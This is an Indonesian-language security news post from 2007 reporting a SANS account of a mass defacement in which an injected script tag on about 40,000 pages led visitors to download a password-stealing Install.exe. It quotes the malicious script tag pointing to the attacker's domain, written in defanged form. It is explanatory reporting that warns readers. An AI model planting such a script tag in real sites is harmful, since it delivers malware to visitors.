Aksi Deface massal oleh yl18.net
Posted by y3dips on November 08 2007 23:05:01
Dilaporkan oleh SANS dua hari yang lalu (tanggal 6 november), bahwa ratusan domain (hampir 40 ribu halaman) di internet di yakini telah di ambil alih oleh pembuat situs yl18.net. Cara deface massal tersebut adalah dengan melakukan injeksi "script tag" yang secara massal ke 40 ribu halaman web dari berbagai domain. "Script tag" atau barisan perintah ini adalah salah satu kode XSS (Cross site scripting) yang berisikan link ke file javascript di sebuah situs yang beralamat di hXXp://yl18.net
Extended News
Dilaporkan oleh SANS dua hari yang lalu (tanggal 6 november), bahwa ratusan domain (hampir 40 ribu halaman) di internet di yakini telah di ambil alih oleh pembuat situs yl18.net. Cara deface massal tersebut adalah dengan melakukan injeksi "script tag" yang secara massal ke 40 ribu halaman web dari berbagai domain. "Script tag" atau barisan perintah ini adalah salah satu kode XSS (Cross site scripting) yang berisikan link ke file javascript di sebuah situs yang beralamat di hXXp://yl18.net

Potongan kode XSS tersebut adalah script src="hXXp://yl 18.net/0.js", yang akan men"generate" sebuah halaman yang berisi kode yang akan mendownload sebuah file executable windows file bernama Install.exe yang apabila anda coba buka dengan aplikasi dissasembler atau sekedar melihat strings di dalam file tersebut, maka akan banyak "perintah" berbahaya didalamnya, termasuk mendownload berbagai file lain.

berikut ini step by step gambar dari situs tersebut (yang sampai tulisan ini dibuat masih bisa diakses; jangan di akses apabila anda tidak yakin, karena kemungkinan akan berbahaya!)



Dan akan terciptalah sebuah dokumen baru yang memiliki URL lengkap di hXXp://yl 18.net/EDImage.htm



Yang apabila anda lihat source codenya akan berisikan frame yang berisi url untuk mendownload sebuah file *.exe (NoScript akan dengan cuma-cuma melakukan blocking buat anda :))



Skrip ini di sebarkan dengan di injeksikan keberbagai fasilitas dari suatu situs, semisal buku tamu dan komentar, yang nantinya akan mengantarkan pengunjung untuk mendownload dan mengeksekusi file tersebut, yang setelah di review oleh pihak SANS berisikan palikasi pencuri password untuk game online, sampai kepada aplikasi yang akan mengeksploitasi celah pada komputer anda. Bahkan, saat penulis melakukan searching menggunakan strings "yl18.net" di google, maka terlihat beberapa situs yang telah disisipi Baris kode berbahaya tersebut



Masih menurut SANS, tindakan attacker yang telah berhasil mengambil alih satu buah server di CHINA dan menanamkan "malicious code " itu kesebuah situs dengan domain yang bisa mudah di dapat adalah hal yang tidak sulit. Sedangkan upaya sesungguhnya adalah saat attacker menanamkan link ke ratusan situs (yang mengandung kode berbahaya) di internet.